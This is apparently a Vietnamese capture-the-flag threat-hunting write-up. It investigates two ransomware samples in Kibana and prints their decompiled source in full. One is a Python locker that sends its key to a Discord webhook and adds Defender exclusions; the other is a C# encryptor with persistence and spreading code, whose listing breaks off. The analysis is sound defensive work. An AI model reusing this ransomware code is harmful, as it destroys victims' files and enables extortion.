# Threat Hunting: grandbazaar   > Can you identify the threats in the Grand Bazaar of activities? --- ## 1. Setup  ```powershell! # Local Kibana URL LOCAL_KBN_URL=https://127.0.0.1:5601 # Local ES URL LOCAL_ES_URL=https://127.0.0.1:9200 # Username for Kibana ELASTIC_USERNAME=elastic # Password for the 'elastic' user (at least 6 characters) ELASTIC_PASSWORD=111111 # Password for the 'kibana_system' user (at least 6 characters) KIBANA_PASSWORD=111111 # Version of Elastic products STACK_VERSION=9.0.1 # Testing pre-releases? Use the SNAPSHOT option below: # STACK_VERSION=8.11.0-SNAPSHOT # Bulk Enable Detection Rules by OS LinuxDR=0 WindowsDR=0 MacOSDR=0 # Set the cluster name CLUSTER_NAME=elastic-container-project # Set to "basic" or "trial" to automatically start the 30-day trial LICENSE=basic #LICENSE=trial # Port to expose Elasticsearch HTTP API to the host ES_PORT=9200 #ES_PORT=127.0.0.1:9200 # Port to expose Kibana to the host KIBANA_PORT=5601 # Port to expose Fleet to the host FLEET_PORT=8220 # Increase or decrease based on the available host memory (in bytes) MEM_LIMIT=2147483648 ``` ### 1.1 Dựng docker  > docker compose up -d  Muốn tắt các docker để tránh lag sau khi dùng thì dùng: > docker stop $(docker ps -q) ```bash! ┌──(kali㉿kali)-[~] └─$ docker ps -a CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 91b37ede00f5 docker.elastic.co/elastic-agent/elastic-agent:9.0.1 "/usr/bin/tini -- /u…" 3 days ago Exited (143) 53 minutes ago ecp-fleet-server a760567fc3b7 docker.elastic.co/kibana/kibana:9.0.1 "/bin/tini -- /usr/l…" 3 days ago Exited (137) 53 minutes ago ecp-kibana 675c1b18a240 docker.elastic.co/elasticsearch/elasticsearch:9.0.1 "/bin/tini -- /usr/l…" 3 days ago Exited (137) 53 minutes ago ecp-elasticsearch ``` > Xem tất cả container và trạng thái ```bash! ┌──(kali㉿kali)-[~] └─$ docker start 91b37ede00f5 a760567fc3b7 675c1b18a240 91b37ede00f5 a760567fc3b7 675c1b18a240 ``` > Khởi động lại --- ### 1.2 Kiểm tra container & cổng dịch vụ ```bash docker ps ``` ```bash! ┌──(kali㉿kali)-[~] └─$ docker ps -a CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 91b37ede00f5 docker.elastic.co/elastic-agent/elastic-agent:9.0.1 "/usr/bin/tini -- /u…" 3 days ago Up 4 minutes 0.0.0.0:8220->8220/tcp, :::8220->8220/tcp ecp-fleet-server a760567fc3b7 docker.elastic.co/kibana/kibana:9.0.1 "/bin/tini -- /usr/l…" 3 days ago Up 5 minutes (healthy) 0.0.0.0:5601->5601/tcp, :::5601->5601/tcp ecp-kibana 675c1b18a240 docker.elastic.co/elasticsearch/elasticsearch:9.0.1 "/bin/tini -- /usr/l…" 3 days ago Up 5 minutes (healthy) 0.0.0.0:9200->9200/tcp, :::9200->9200/tcp, 9300/tcp ecp-elasticsearch ```  --- ## 2. Bắt đầu truy cập vào Kibana & điều tra ```bash! # Local Kibana URL LOCAL_KBN_URL=https://127.0.0.1:5601 # Local ES URL LOCAL_ES_URL=https://127.0.0.1:9200 # Username for Kibana ELASTIC_USERNAME=elastic # Password for the 'elastic' user (at least 6 characters) ELASTIC_PASSWORD=111111 # Password for the 'kibana_system' user (at least 6 characters) KIBANA_PASSWORD=111111 ```   --- ### 2.1 Q1. How many alerts there exists in total in the elastic data? Ở câu hỏi đầu tiên này thì để lọc ra được các cảnh báo, mình dùng syntax này: `kibana.alert.uuid: *`:   > Answer: 23 --- ### 2.2 Q2. What are the hashes of the threats? DCTF{sha256(hash-malware-first):sha256(hash-malware-second)} Để tìm ra các mối đe dọa, mình phân tích các cảnh báo (Alerts) trong Kibana.  Trong danh sách cảnh báo, mình thấy nhiều hoạt động đáng ngờ. Mình chọn điều tra cảnh báo "Windows Defender Exclusions Added via PowerShell" trước vì có vẻ đây là một hành vi rất đáng ngờ (TTP: T1562.001 - Impair Defenses: Disable or Modify Tools).  Mình phát hiện được:  Có thể thấy tiến trình `powershell` được khởi chạy bởi `cmd`, truy ngược lên tiếp thì là 1 tiến trình có tên khá lạ, ban đầu thì mình không chắc nó có phải hash sha256 không, nên mình lấy hash md5 của nó và tra trên [VT](https://www.virustotal.com/gui/file/a31e56a60d7c9b547b1e7dfe402d7fb02789dcd117eadf59593e5401460843d4)  Chuẩn thứ cần tìm, mình có được hash đầu là > a31e56a60d7c9b547b1e7dfe402d7fb02789dcd117eadf59593e5401460843d4 Tiếp tục tìm các cảnh báo sau, mình lại tìm được 1 con malware nữa:  > https://www.virustotal.com/gui/file/a2254802dd387d0e0ceb61e2849a44b51879f625b89879e29592c80da9d479a2 Như con trước, tên của file thực thi chính là hash sha256 của nó: ```! Answer: DCTF{a31e56a60d7c9b547b1e7dfe402d7fb02789dcd117eadf59593e5401460843d4:a2254802dd387d0e0ceb61e2849a44b51879f625b89879e29592c80da9d479a2} ``` --- ### 2.3 Q3. What is the SHA3-384 hash of the second threat? Để tìm được hash sha3-384 từ con malware thứ 2, mình chỉ cần tìm hash nó trên [MalwareBazaar](https://bazaar.abuse.ch/sample/a2254802dd387d0e0ceb61e2849a44b51879f625b89879e29592c80da9d479a2/#file_info):  > Answer: DCTF{4f9c609d2f44b18b359d2e52061889302da0dca8e3d244a3e4759b5e78463a9e9fc9046d4acd3e0c7a866f0a01beff3b} --- ### 2.4 Q4. What programming language did the first malware used? Tiếp nối câu hỏi 3, mình vẫn dùng MalwareBazaar lấy file sample về (lưu ý dùng trong máy ảo):   Dễ thấy con ransomware này được compile bằng `python` > Answer: Python --- ### 2.5 Q5. What domain did the first malware tried to contact? Để xác định được domain (Có thể là C2) mà con ransomware contact tới, có thể chạy trong môi trường ảo rồi bật wireshark bắt lại hoặc rev nó, do con ransom này compile bằng python, khá dễ để khôi phục lại source nên mình rev luôn để xem hành vi hoàn toàn của nó:  > https://pylingual.io/view_chimera?identifier=204bf9aeb7d178189a9229120afc04474d1c61791b859301db8696e78b5928f1 Source ransom: ```python! # Decompiled with PyLingual (https://pylingual.io) # Internal filename: ransomtest.py # Bytecode version: 3.13.0rc3 (3571) # Source timestamp: 1970-01-01 00:00:00 UTC (0) """\nPROJECT CHIMERA - AUTHORIZED EDUCATIONAL RANSOMWARE SIMULATION\nDARKFORGE-X // SHADOW-CORE MODE\n""" import os import sys import ctypes import json import random import string import subprocess import threading import requests from Crypto.Cipher import AES from Crypto.Util.Padding import pad, unpad from Crypto.Random import get_random_bytes import tkinter as tk from tkinter import messagebox, simpledialog import winreg import socket import getpass RANSOM_EMAIL = 'faithful.wallaby.esxq@rapidletter.net' DISCORD_WEBHOOK_URL = 'https://discord.com/api/webhooks/1410594867922342051/fTDUmA98sY4hmx3FUdxeDJlPOXxlmA-TilmlmBIsyQ4ZMXCzFoo5Wx9oLwkYJufB8-8z' def generate_ransom_id(): hostname = socket.gethostname() username = getpass.getuser() unique_seed = f"{hostname}{username}{os.getenv('PROCESSOR_IDENTIFIER', '')}" random.seed(unique_seed) chars = string.ascii_letters + string.digits return ''.join((random.choice(chars) for _ in range(128))) RANSOM_ID = generate_ransom_id() DECRYPTION_KEY = ''.join((random.choice(string.ascii_letters + string.digits) for _ in range(48))) FILE_SIGNATURE = b'CHIMERA_ENC' def add_av_exclusions(): """Adds executable path to exclusions for major AVs using PowerShell.""" # inserted paths_to_exclude = [os.path.abspath(sys.argv[0])] ps_commands = [] ps_commands.append(f'Add-MpPreference -ExclusionPath \"{paths_to_exclude[0]}\"') av_registry_paths = {'Malwarebytes': 'SOFTWARE\\Malwarebytes', 'Kaspersky': 'SOFTWARE\\KasperskyLab', 'Bitdefender': 'SOFTWARE\\Bitdefender', 'McAfee': 'SOFTWARE\\McAfee'} for av_name, reg_path in av_registry_paths.items(): try: with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, reg_path, 0, winreg.KEY_READ): print(f'[SIM] Found {av_name}') ps_commands.append(f'# Add exclusion for {av_name} here') else: # inserted try: ps_script = '\n'.join(ps_commands) subprocess.run(['powershell', '-ExecutionPolicy', 'Bypass', '-Command', ps_script], shell=True, capture_output=True) print('[+] AV exclusions attempted.') except WindowsError: continue except Exception as e: print(f'[-] AV exclusion failed: {e}') def remove_av_exclusions(): """Removes the added AV exclusions.""" # inserted path_to_remove = os.path.abspath(sys.argv[0]) try: ps_script = f'Remove-MpPreference -ExclusionPath \"{path_to_remove}\"' subprocess.run(['powershell', '-ExecutionPolicy', 'Bypass', '-Command', ps_script], shell=True, capture_output=True) print('[+] AV exclusions removed.') except Exception as e: print(f'[-] Failed to remove AV exclusions: {e}') def set_black_background(): """Changes the desktop background to solid black.""" # inserted try: bmp_path = os.path.join(os.getenv('TEMP'), 'black_bg.bmp') with open(bmp_path, 'wb') as f: f.write(b'BM:\x00\x00\x00\x00\x00\x00\x006\x00\x00\x00(\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x18\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') ctypes.windll.user32.SystemParametersInfoW(20, 0, bmp_path, 3) except Exception as e: print(f'[-] Failed to set background: {e}') def toggle_task_manager(enable): """Enables or disables Task Manager via registry.""" # inserted try: key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, 'Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System', 0, winreg.KEY_SET_VALUE) if enable: winreg.DeleteValue(key, 'DisableTaskMgr') winreg.CloseKey(key) print(f"[+] Task Manager {('enabled' if enable else 'disabled')}.") except WindowsError: try: key = winreg.CreateKey(winreg.HKEY_CURRENT_USER, 'Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System') if not enable: winreg.SetValueEx(key, 'DisableTaskMgr', 0, winreg.REG_DWORD, 1) winreg.CloseKey(key) except Exception as e: print(f'[-] Failed to toggle Task Manager: {e}') def encrypt_file(file_path, key): """Encrypts a file using AES-256-CBC.""" # inserted try: if os.path.getsize(file_path) == 0: pass # postinserted return False except Exception as e: print(f'[-] Error encrypting {file_path}: {e}') return False def decrypt_file(file_path, key): """Decrypts a file using AES-256-CBC.""" # inserted try: with open(file_path, 'rb') as f: data = f.read() if not data.startswith(FILE_SIGNATURE): pass # postinserted return False except Exception as e: print(f'[-] Error decrypting {file_path}: {e}') return False def encrypt_user_files(): """Recursively encrypts files in user directories.""" # inserted user_dirs = [os.path.expanduser('~/Documents'), os.path.expanduser('~/Pictures'), os.path.expanduser('~/Downloads'), os.path.expanduser('~/Desktop')] encrypted_count = 0 for root_dir in user_dirs: if os.path.exists(root_dir): pass # postinserted else: # inserted for root, _, files in os.walk(root_dir): for file in files: file_path = os.path.join(root, file) try: if encrypt_file(file_path, DECRYPTION_KEY): encrypted_count += 1 print(f'[+] Encrypted {encrypted_count} files.') except: pass # postinserted pass def decrypt_user_files(): """Recursively decrypts files in user directories.""" # inserted user_dirs = [os.path.expanduser('~/Documents'), os.path.expanduser('~/Pictures'), os.path.expanduser('~/Downloads'), os.path.expanduser('~/Desktop')] decrypted_count = 0 for root_dir in user_dirs: if os.path.exists(root_dir): pass # postinserted else: # inserted for root, _, files in os.walk(root_dir): for file in files: file_path = os.path.join(root, file) try: if decrypt_file(file_path, DECRYPTION_KEY): decrypted_count += 1 print(f'[+] Decrypted {decrypted_count} files.') except: pass # postinserted pass def create_initial_prompt(): """Creates the initial \'Are you a 1, or a 0?\' prompt.""" # inserted root = tk.Tk() root.title('Question') root.geometry('300x150') root.resizable(False, False) root.attributes('-topmost', True) label = tk.Label(root, text='Are you a 1, or a 0?', font=('Arial', 14)) label.pack(pady=20) def on_choice(choice): root.destroy() if choice == 1: execute_ransomware_path() return None btn_1 = tk.Button(root, text='1', command=lambda: on_choice(1), width=10) btn_1.pack(pady=5) btn_0 = tk.Button(root, text='0', command=lambda: on_choice(0), width=10) btn_0.pack(pady=5) root.mainloop() def create_ransom_note(): """Creates the fullscreen ransomware note and handles decryption.""" # inserted root = tk.Tk() root.title('IMPORTANT MESSAGE') root.attributes('-fullscreen', True) root.configure(bg='black') frame = tk.Frame(root, bg='black') frame.place(relx=0.5, rely=0.5, anchor='center') message = f'STOP ACTING\n\nYour files has been encrypted!\nSend a message with your Ransomware ID to this e-mail for a decryption key:\n{RANSOM_EMAIL}\n\nYour Ransomware ID: {RANSOM_ID}\n\nDecryption key:' label = tk.Label(frame, text=message, fg='red', bg='black', font=('Arial', 16)) label.pack(pady=20) key_var = tk.StringVar() entry = tk.Entry(frame, textvariable=key_var, width=50, font=('Arial', 14)) entry.pack(pady=20) def attempt_decryption(): entered_key = key_var.get() if entered_key == DECRYPTION_KEY: decrypt_user_files() toggle_task_manager(True) remove_av_exclusions() root.destroy() try: os.remove(sys.argv[0]) sys.exit(0) return None except: pass # postinserted pass entry.bind('<Return>', lambda event: attempt_decryption()) btn = tk.Button(frame, text='DECRYPT', command=attempt_decryption, bg='red', fg='white', font=('Arial', 14)) btn.pack(pady=20) root.mainloop() def send_discord_webhook(): """Sends the ransomware ID and decryption key to Discord webhook.""" # inserted data = {'content': f'Ransomware ID: {RANSOM_ID}\nDecryption Key: {DECRYPTION_KEY}', 'username': 'Project Chimera', 'embeds': [{'title': 'New Infection', 'description': f'**Ransomware ID:** {RANSOM_ID}\n**Decryption Key:** {DECRYPTION_KEY}', 'color': 16711680}]} try: requests.post(DISCORD_WEBHOOK_URL, json=data) print('[+] Discord webhook sent.') except Exception as e: print(f'[-] Failed to send Discord webhook: {e}') def execute_ransomware_path(): """Executes the full ransomware path.""" # inserted print('[+] Executing ransomware path...') add_av_exclusions() set_black_background() encrypt_user_files() toggle_task_manager(False) send_discord_webhook() create_ransom_note() def execute_self_destruct_path(): """Executes the self-destruct path.""" # inserted print('[+] Executing self-destruct path...') root = tk.Tk() root.withdraw() messagebox.showinfo('Info', 'Oki!') root.destroy() try: os.remove(sys.argv[0]) sys.exit(0) except: pass # postinserted pass def is_admin(): """Check if the program is running with admin privileges.""" # inserted try: return ctypes.windll.shell32.IsUserAnAdmin() except: return False def main(): """Main execution function.""" # inserted if not is_admin(): ctypes.windll.shell32.ShellExecuteW(None, 'runas', sys.executable, ' '.join(sys.argv), None, 1) sys.exit(0) create_initial_prompt() if __name__ == '__main__': main() ``` Có thể thấy ngay payload chứa RANSOM_ID và DECRYPTION_KEY (username “Project Chimera”, có embed). IOC mạng: Miền discord.com, đường dẫn /api/webhooks/1410594867922342051/.... > Answer: discord.com --- ### 2.6 Q6. How many selecting options did the first malware GUI had? Từ source chúng ta vừa lấy được, có thể thấy Giao diện ép người dùng đưa ra quyết định: Mở GUI Tkinter hỏi “Are you a 1, or a 0?”. Bấm 1 → chạy “đường ransomware”; bấm 0 → đường “tự huỷ”. Như vậy là có 2 lựa chọn. > Answer: 2 --- ### 2.7 Q7. What MITRE Technique did the second malware with the “legitimate” process used? Quay lại với kibana để tìm hiểu hành vi của con mã độc thứ 2 (a2254802dd387d0e0ceb61e2849a44b51879f625b89879e29592c80da9d479a2):  Có thể thấy điểm bất thường ở đây khi mình ấn vào tiến trình `svchost.exe` đã được thực thi, điểm cần chú ý ở đây là đường dẫn thực thi của nó (Process Executable), ở đây là `C:\Users\malware\AppData\Roaming\svchost.exe`, rõ ràng là vị trí bình thường của nó không thể nằm ở Roaming được:  Từ đây mình có thể đoán được kỹ thuật đã được kẻ tấn công sử dụng ở đây là gì, mình tra GG với câu hỏi `what mitre att&ck technique is "svchost.exe" in "AppData\Roaming"` và kết quả nhận lại được là:  Kết quả tìm kiếm đã xác nhận hành vi này chính là Masquerading (T1036). > Answer: T1036 --- ### 2.8 Q8. How many child processes did the svchost had? Chuyển qua tab "Discover" trong Kibana  Tìm kiếm với `process.parent.executable` với query là đường dẫn khả nghi của con `svchost.exe` vừa rồi: `process.parent.executable : "C:\\Users\\malware\\AppData\\Roaming\\svchost.exe"`, mình có được:  Kết quả là 3 tiến trình con mà svchost có. > Answer: 3 --- ### 2.9 Q9. What is the name of the file that is created on desktop after second malware? Ở đây có 2 hướng để làm bài này, hoặc là chúng ta download sample về rev (con này mình thấy nó là .NET, có thể dùng dnspy hoặc ilspy), hoặc cách thứ 2 là tìm ở path `Desktop` sẽ nhanh hơn: `file.path:*Desktop*`  Tuy nhiên dù đã trace theo thời gian mà con malware thứ 2 thực thi trở đi, với 249 file trên desktop thì mình vẫn không tìm được cái đúng, khả năng nó đã bị xóa mất, mình quay sang cách 2 kia là rev nó luôn: > https://bazaar.abuse.ch/download/a2254802dd387d0e0ceb61e2849a44b51879f625b89879e29592c80da9d479a2/ May mắn là mình có được src gốc của nó sau khi mở dnspy luôn mà không cần phải deob hay gì cả:  Source malware 2: ```C! using System; using System.ComponentModel; using System.Diagnostics; using System.IO; using System.Reflection; using System.Runtime.InteropServices; using System.Security.Cryptography; using System.Text; using System.Text.RegularExpressions; using System.Threading; using System.Windows.Forms; using Microsoft.Win32; namespace ConsoleApplication7 { // Token: 0x02000002 RID: 2 internal class Program { // Token: 0x06000001 RID: 1 [DllImport("user32.dll", CharSet = CharSet.Auto)] private static extern int SystemParametersInfo(uint action, uint uParam, string vParam, uint winIni); // Token: 0x06000002 RID: 2 RVA: 0x00002058 File Offset: 0x00000258 private static void Main(string[] args) { if (Program.AlreadyRunning()) { Environment.Exit(1); } if (Program.checkSleep) { Program.sleepOutOfTempFolder(); } if (Program.checkAdminPrivilage) { Program.copyResistForAdmin(Program.processName); } else if (Program.checkCopyRoaming) { Program.copyRoaming(Program.processName); } if (Program.checkStartupFolder) { Program.addLinkToStartup(); } Program.lookForDirectories(); if (Program.checkAdminPrivilage) { if (Program.checkdeleteShadowCopies) { Program.deleteShadowCopies(); } if (Program.checkdisableRecoveryMode) { Program.disableRecoveryMode(); } if (Program.checkdeleteBackupCatalog) { Program.deleteBackupCatalog(); } } if (Program.checkSpread) { Program.spreadIt(Program.spreadName); } Program.addAndOpenNote(); Program.SetWallpaper(Program.base64Image); new Thread(delegate { Program.Run(); }).Start(); } // Token: 0x06000003 RID: 3 RVA: 0x00002125 File Offset: 0x00000325 public static void Run() { Application.Run(new driveNotification.NotificationForm()); } // Token: 0x06000004 RID: 4 RVA: 0x00002134 File Offset: 0x00000334 private static void sleepOutOfTempFolder() { string directoryName = Path.GetDirectoryName(Assembly.GetEntryAssembly().Location); string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); if (directoryName != folderPath) { Thread.Sleep(Program.sleepTextbox * 1000); } } // Token: 0x06000005 RID: 5 RVA: 0x00002174 File Offset: 0x00000374 private static bool AlreadyRunning() { Process[] processes = Process.GetProcesses(); Process currentProcess = Process.GetCurrentProcess(); foreach (Process process in processes) { try { if (process.Modules[0].FileName == Assembly.GetExecutingAssembly().Location && currentProcess.Id != process.Id) { return true; } } catch (Exception) { } } return false; } // Token: 0x06000006 RID: 6 RVA: 0x000021F8 File Offset: 0x000003F8 public static byte[] random_bytes(int length) { Random random = new Random(); length++; byte[] array = new byte[length]; random.NextBytes(array); return array; } // Token: 0x06000007 RID: 7 RVA: 0x00002220 File Offset: 0x00000420 public static string RandomString(int length) { StringBuilder stringBuilder = new StringBuilder(); for (int i = 0; i < length; i++) { char c = "abcdefghijklmnopqrstuvwxyz0123456789"[Program.random.Next(0, "abcdefghijklmnopqrstuvwxyz0123456789".Length)]; stringBuilder.Append(c); } return stringBuilder.ToString(); } // Token: 0x06000008 RID: 8 RVA: 0x00002270 File Offset: 0x00000470 public static string RandomStringForExtension(int length) { if (Program.encryptedFileExtension == "") { StringBuilder stringBuilder = new StringBuilder(); for (int i = 0; i < length; i++) { char c = "abcdefghijklmnopqrstuvwxyz0123456789"[Program.random.Next(0, "abcdefghijklmnopqrstuvwxyz0123456789".Length)]; stringBuilder.Append(c); } return stringBuilder.ToString(); } return Program.encryptedFileExtension; } // Token: 0x06000009 RID: 9 RVA: 0x000022D4 File Offset: 0x000004D4 public static string Base64EncodeString(string plainText) { byte[] bytes = Encoding.UTF8.GetBytes(plainText); return Convert.ToBase64String(bytes); } // Token: 0x0600000A RID: 10 RVA: 0x000022F4 File Offset: 0x000004F4 public static string randomEncode(string plainText) { byte[] bytes = Encoding.UTF8.GetBytes(plainText); return string.Concat(new string[] { "<EncyptedKey>", Program.Base64EncodeString(Program.RandomString(41)), "<EncyptedKey> ", Program.RandomString(2), Convert.ToBase64String(bytes) }); } // Token: 0x0600000B RID: 11 RVA: 0x00002368 File Offset: 0x00000568 private static void encryptDirectory(string location) { try { string[] files = Directory.GetFiles(location); bool flag = true; for (int i = 0; i < files.Length; i++) { try { string extension = Path.GetExtension(files[i]); string fileName = Path.GetFileName(files[i]); if (Array.Exists<string>(Program.validExtensions, (string E) => E == extension.ToLower()) && fileName != Program.droppedMessageTextbox) { FileInfo fileInfo = new FileInfo(files[i]); fileInfo.Attributes = FileAttributes.Normal; if (fileInfo.Length < 2117152L) { if (Program.encryptionAesRsa) { Program.EncryptFile(files[i]); } } else if (fileInfo.Length > 200000000L) { Random random = new Random(); int num = random.Next(200000000, 300000000); string @string = Encoding.UTF8.GetString(Program.random_bytes(num)); File.WriteAllText(files[i], Program.randomEncode(@string)); File.Move(files[i], files[i] + "." + Program.RandomStringForExtension(4)); } else { string string2 = Encoding.UTF8.GetString(Program.random_bytes(Convert.ToInt32(fileInfo.Length) / 4)); File.WriteAllText(files[i], Program.randomEncode(string2)); File.Move(files[i], files[i] + "." + Program.RandomStringForExtension(4)); } if (flag) { flag = false; File.WriteAllLines(location + "/" + Program.droppedMessageTextbox, Program.messages); } } } catch { } } string[] directories = Directory.GetDirectories(location); for (int j = 0; j < directories.Length; j++) { Program.encryptDirectory(directories[j]); } } catch (Exception) { } } // Token: 0x0600000C RID: 12 RVA: 0x0000254C File Offset: 0x0000074C public static string rsaKey() { StringBuilder stringBuilder = new StringBuilder(); return stringBuilder.ToString(); } // Token: 0x0600000D RID: 13 RVA: 0x00002568 File Offset: 0x00000768 public static string CreatePassword(int length) { StringBuilder stringBuilder = new StringBuilder(); Random random = new Random(); while (0 < length--) { stringBuilder.Append("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/"[random.Next("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/".Length)]); } return stringBuilder.ToString(); } // Token: 0x0600000E RID: 14 RVA: 0x000025C0 File Offset: 0x000007C0 public static byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes) { byte[] array = null; byte[] array2 = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 }; using (MemoryStream memoryStream = new MemoryStream()) { using (RijndaelManaged rijndaelManaged = new RijndaelManaged()) { rijndaelManaged.KeySize = 256; rijndaelManaged.BlockSize = 128; Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passwordBytes, array2, 1000); rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.KeySize / 8); rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes(rijndaelManaged.BlockSize / 8); rijndaelManaged.Mode = CipherMode.CBC; using (CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndaelManaged.CreateEncryptor(), CryptoStreamMode.Write)) { cryptoStream.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length); cryptoStream.Close(); } array = memoryStream.ToArray(); } } return array; } // Token: 0x0600000F RID: 15 RVA: 0x000026BC File Offset: 0x000008BC public static void EncryptFile(string file) { byte[] array = File.ReadAllBytes(file); string text = Program.CreatePassword(20); byte[] bytes = Encoding.UTF8.GetBytes(text); byte[] array2 = Program.AES_Encrypt(array, bytes); File.WriteAllText(file, "<EncryptedKey>" + Program.RSAEncrypt(text, Program.rsaKey()) + "<EncryptedKey>" + Convert.ToBase64String(array2)); File.Move(file, file + "." + Program.RandomStringForExtension(4)); } // Token: 0x06000010 RID: 16 RVA: 0x0000272C File Offset: 0x0000092C public static string RSAEncrypt(string textToEncrypt, string publicKeyString) { byte[] bytes = Encoding.UTF8.GetBytes(textToEncrypt); string text2; using (RSACryptoServiceProvider rsacryptoServiceProvider = new RSACryptoServiceProvider(1024)) { try { rsacryptoServiceProvider.FromXmlString(publicKeyString.ToString()); byte[] array = rsacryptoServiceProvider.Encrypt(bytes, true); string text = Convert.ToBase64String(array); text2 = text; } finally { rsacryptoServiceProvider.PersistKeyInCsp = false; } } return text2; } // Token: 0x06000011 RID: 17 RVA: 0x000027A4 File Offset: 0x000009A4 private static void lookForDirectories() { foreach (DriveInfo driveInfo in DriveInfo.GetDrives()) { if (driveInfo.ToString() != "C:\\") { Program.encryptDirectory(driveInfo.ToString()); } } string text = Program.userDir + Program.userName + "\\Desktop"; string text2 = Program.userDir + Program.userName + "\\Links"; string text3 = Program.userDir + Program.userName + "\\Contacts"; string text4 = Program.userDir + Program.userName + "\\Desktop"; string text5 = Program.userDir + Program.userName + "\\Documents"; string text6 = Program.userDir + Program.userName + "\\Downloads"; string text7 = Program.userDir + Program.userName + "\\Pictures"; string text8 = Program.userDir + Program.userName + "\\Music"; string text9 = Program.userDir + Program.userName + "\\OneDrive"; string text10 = Program.userDir + Program.userName + "\\Saved Games"; string text11 = Program.userDir + Program.userName + "\\Favorites"; string text12 = Program.userDir + Program.userName + "\\Searches"; string text13 = Program.userDir + Program.userName + "\\Videos"; Program.encryptDirectory(text); Program.encryptDirectory(text2); Program.encryptDirectory(text3); Program.encryptDirectory(text4); Program.encryptDirectory(text5); Program.encryptDirectory(text6); Program.encryptDirectory(text7); Program.encryptDirectory(text8); Program.encryptDirectory(text9); Program.encryptDirectory(text10); Program.encryptDirectory(text11); Program.encryptDirectory(text12); Program.encryptDirectory(text13); Program.encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)); Program.encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonDocuments)); Program.encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonPictures)); Program.encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonMusic)); Program.encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonVideos)); Program.encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory)); } // Token: 0x06000012 RID: 18 RVA: 0x000029AC File Offset: 0x00000BAC private static void copyRoaming(string processName) { string friendlyName = AppDomain.CurrentDomain.FriendlyName; string location = Assembly.GetExecutingAssembly().Location; Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + friendlyName; string text = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\"; string text2 = text + processName; if (friendlyName != processName || location != text2) { if (!File.Exists(text2)) { File.Copy(friendlyName, text2); ProcessStartInfo processStartInfo = new ProcessStartInfo(text2); processStartInfo.WorkingDirectory = text; if (new Process { StartInfo = processStartInfo }.Start()) { Environment.Exit(1); return; } } else { try { File.Delete(text2); Thread.Sleep(200); File.Copy(friendlyName, text2); } catch { } ProcessStartInfo processStartInfo2 = new ProcessStartInfo(text2); processStartInfo2.WorkingDirectory = text; if (new Process { StartInfo = processStartInfo2 }.Start()) { Environment.Exit(1); } } } } // Token: 0x06000013 RID: 19 RVA: 0x00002AB4 File Offset: 0x00000CB4 private static void copyResistForAdmin(string processName) { string friendlyName = AppDomain.CurrentDomain.FriendlyName; string location = Assembly.GetExecutingAssembly().Location; Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + friendlyName; string text = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\"; string text2 = text + processName; ProcessStartInfo processStartInfo = new ProcessStartInfo(text2) { UseShellExecute = true, Verb = "runas", WindowStyle = 0, WorkingDirectory = text }; Process process = new Process(); process.StartInfo = processStartInfo; if (friendlyName != processName || location != text2) { if (!File.Exists(text2)) { File.Copy(friendlyName, text2); try { Process.Start(processStartInfo); Environment.Exit(1); return; } catch (Win32Exception ex) { if (ex.NativeErrorCode == 1223) { Program.copyResistForAdmin(processName); } return; } } try { File.Delete(text2); Thread.Sleep(200); File.Copy(friendlyName, text2); } catch { } try { Process.Start(processStartInfo); Environment.Exit(1); } catch (Win32Exception ex2) { if (ex2.NativeErrorCode == 1223) { Program.copyResistForAdmin(processName); } } } } // Token: 0x06000014 RID: 20 RVA: 0x00002C04 File Offset: 0x00000E04 private static void addLinkToStartup() { string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.Startup); string text = Process.GetCurrentProcess().ProcessName; using (StreamWriter streamWriter = new StreamWriter(folderPath + "\\" + text + ".url")) { string location = Assembly.GetExecutingAssembly().Location; streamWriter.WriteLine("[InternetShortcut]"); streamWriter.WriteLine("URL=file:///" + location); streamWriter.WriteLine("IconIndex=0"); string text2 = location.Replace('\\', '/'); streamWriter.WriteLine("IconFile=" + text2); } } // Token: 0x06000015 RID: 21 RVA: 0x00002CA8 File Offset: 0x00000EA8 private static void addAndOpenNote() { string text = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + Program.droppedMessageTextbox; try { File.WriteAllLines(text, Program.messages); Thread.Sleep(500); Process.Start(text); } catch { } } // Token: 0x06000016 RID: 22 RVA: 0x00002D00 File Offset: 0x00000F00 private static void registryStartup() { try { RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); registryKey.SetValue("Microsoft Store", Assembly.GetExecutingAssembly().Location); } catch { } } // Token: 0x06000017 RID: 23 RVA: 0x00002D48 File Offset: 0x00000F48 private static void spreadIt(string spreadName) { foreach (DriveInfo driveInfo in DriveInfo.GetDrives()) { if (driveInfo.ToString() != "C:\\" && !File.Exists(driveInfo.ToString() 